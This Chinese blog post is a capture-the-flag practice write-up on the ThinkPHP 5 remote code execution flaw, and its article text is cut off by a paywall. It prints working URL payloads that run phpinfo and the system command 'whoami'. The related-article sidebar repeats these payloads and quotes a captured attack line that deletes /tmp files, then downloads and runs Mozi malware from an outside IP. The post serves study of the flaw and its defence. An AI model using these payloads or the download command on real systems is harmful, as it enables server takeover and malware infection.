攻防世界web练习15

最新推荐文章于 2023-10-13 19:29:11 发布
最新推荐文章于 2023-10-13 19:29:11 发布
阅读量381 收藏 1
点赞数
文章标签: 服务器 php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/H_S2022/article/details/125767905
版权

攻防世界web练习

十五、php_rce

http://111.200.241.244:59735/
ThinkPHP远程代码执行

这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:
输入:http://your-ip:8080/index.php

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

可执行phpinfo:

可以执行phpinfo,那可不可以执行其他命令呢?查了一下网上的payload,如下:

输入:http://your-ip:8080/index.php

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

返回看到:www-data www-data

【原理】

ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞。

  1. http://111.200.241.244:59735/index.php
    ?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=ph

最低0.47元/天 解锁文章
H_S2022
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Thinkphp5.0.x漏洞原理分析
weixin_45682070的博客
08-25 1802
本测试环境用的是php7.0.12+apache+thinkphp5.0.20 poc:http://127.0.0.1/tp5.0/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 首先看入口文件,引入thinkphp/start.php文件 跟进thinkphp/start.php,执行的是think/
ThinkPHP5RCE漏洞复现
飞雪 SecurityBlog
06-16 241
Payload:/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
Thinkphp5-5.0.22/5.1.29远程执行代码漏洞
hovcfuti的博客
10-13 317
ThinkPHP版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。升级方法请参考:https://blog.thinkphp.cn/869075。vulhub拉取靶场。写入webshell。
php _get漏洞,thinkphp代码执行getshell的漏洞解决
weixin_42301367的博客
03-18 2474
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell影响的范围:5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类 tp5.0是没有这两个新的类的,漏洞原理URL:ht...
thinkphp5.*远程命令执行漏洞复现
weixin_42075643的博客
01-27 588
ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http://127.0.0.1/tp5/public/index.php/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令] 用B
学习笔记-ThinkPHP5漏洞分析之代码执行(七)
人饭子的博客
11-09 1157
参考链接:Mochazz/ThinkPHP-Vuln/ 影响版本:5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 测试环境:PHP7.3.4、Mysql5.7.26、TP5.0.18 5.1.x : ?s=index/\think\Request/input&filter[]=system&data...
网络攻防练习,可以自己搭网站练习常用网络攻防手段
03-13
DVWA是一个专门为安全专业人士和爱好者设计的,具有各种常见漏洞的Web应用程序,它可以帮助学习者了解并练习网络攻防的各种手段。 首先,我们需要了解什么是Web应用攻击。在现代网络环境中,Web应用是企业与用户...
一个web安全练习靶场.zip
最新发布
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
网络安全练习网站大全.rar
10-16
https://www.zhihu.com/question...web:http://hackin ...安恒的平台:登录 - 明御® 攻防实验室 安恒的平台: https://www ...代码审计的平台(C语言):http://web ...很多,这里就不一一列举了,对了还有一些社会工程学练习网站
YuanRenXue:猿人学Web端爬虫攻防赛第一季 习题练习
05-07
综上所述,"YuanRenXue:猿人学Web端爬虫攻防赛第一季 习题练习"涵盖的内容广泛,包括了JavaScript基础、DOM操作、Ajax/Fetch、防爬策略、会话管理、跨域问题以及安全伦理等多个方面,为学习者提供了一个全面了解和...
thinkphp漏洞研究与复现
Shanfenglan's blog
11-19 1829
文章目录1. Thinkphp5 5.0.22/5.1.291.1 原理1.2 利用2. ThinkPHP5 5.0.232.1 原理2.2 利用参考文章 1. Thinkphp5 5.0.22/5.1.29 1.1 原理 pathinfo模式路由规则为: pathinfo 方式路由 pathinfo:即全路径的访问控制器方法,如:域名/模块/控制器/方法 pathinfo 方式路由示例 // index模块下index控制器index方法 tp5.com/index/index/index 漏洞是由
织梦用的是php还是thinkphp,常见的程序漏洞渗透语句ThinkPHP/织梦(dede)/WordPress等......
weixin_39872123的博客
03-18 1305
都是渗透我博客防火墙里看到的...我只知道大概的渗透语句,和渗透什么程序的.具体好不好使怎么用我就不知道了...#织梦/digg/digg_add.php?id=1&con=2&digg_mod=digg_data%20WHERE%201=2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20...
ThinkPHP5.x-远程命令执行漏洞
LYJ20010728的博客
06-06 725
ThinkPHP 5.x远程命令执行漏洞漏洞原因漏洞影响版本漏洞复现搭建漏洞环境POC1POC2&POC3POC4&POC5 漏洞原因 由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行 漏洞影响版本 Thinkphp 5.x-Thinkphp 5.1.31 Thinkphp 5.0.x<=5.0.23 漏洞复现 搭建漏洞环境 官网下载Thinkphp 5.0.22,下载地址 使用phpstudy搭建环境,解压下载的Thin
Thinkphp5 任意代码执行漏洞复现
satasun的博客
12-06 951
环境搭建 环境搭建 Github传送门 BUU传送门 菜鸡懒得动手直接上buu一键搭建环境 http://node3.buuoj.cn:28078/ POC 首页已经提示thinkphp5了,笔者推荐一款比较好用的谷歌插件Wappalyzer 直接分析出使用了php7.2.31(但是不懂为啥没分析出thinkPHP框架) 直接百度thinkPHP任意代码执行漏洞 大佬博客传送门 poc: http://node3.buuoj.cn:28078/?s=index/think\app/invokefunc
linux服务器http进程CPU异常飙高(轮为免费矿工)
weixin_34235105的博客
01-21 854
最近两次发现服务器CPU占用率达95%左右,top 查看后发现有个进程占用异常偏高。但却不占用大量宽带资源,并且服务器在请求压力不大的情况下能正常访问,也就是不设置资源报警不易发觉。在第一次发现时还以为是系统代码问题导致死循环直接kill进程,但过一周后再次出现相同的情况感觉不对,应该是被玩了。首先查看下进程信息top从top命令中可以看到一个http的进程占用资源非常大,服...
2020 HW一些payload
qq_22807425的博客
09-20 2857
2020 HW一些payload 0x00 碎碎念 以为监控可以抓0day之类的,结果还是常规老漏洞payload多 印度的ip 多数打的是 &cmd=rm+-rf+/tmp/*;wget+http://27.6.195.86:53062/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 这种 也没啥新鲜的 0x01 收集的 Thinkphp /index.php?s=/Index/\think\a
漏洞复现—ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1265
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
ThinkPHP漏洞利用
weixin_41038905的博客
10-11 1498
漏洞标志 影响版本 ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 漏洞利用 先查看版本号。在网址上随意输入一个不存在的模块 地址: 可以看到,thinkphp 版本为 5.0.20 查看信息 漏洞利用 大致原理: 漏洞程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 详情参考:https://www.cnblogs.com/backlion/p/10106676.html 初步利用代码如下: index.php?s..
THINKPHP网站漏洞怎么修复解决
网站安全专家
12-12 3083
THINKPHP漏洞修复,官方于近日,对现有的thinkphp5.0到5.1所有版本进行了升级,以及补丁更新,这次更新主要是进行了一些漏洞修复,最严重的就是之前存在的SQL注入漏洞,以及远程代码执行查询系统的漏洞都进行了修复,官方本以为没有问题了,但是在实际的安全检测当中发现,还是存在问题,还是可以远程代码进行注入,插入非法字符,提交到服务器后端中去。 关于这次发现的oday漏洞,我们来看下...
攻防世界webshell
03-17
攻防世界是一个面向渗透测试和信息安全研究人员的在线攻防平台。Webshell是指一种通过Web应用程序漏洞上传到服务器上的恶意...在攻防世界中,可以使用webshell来模拟攻击者的行为,并在模拟的攻击场景中练习防御技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值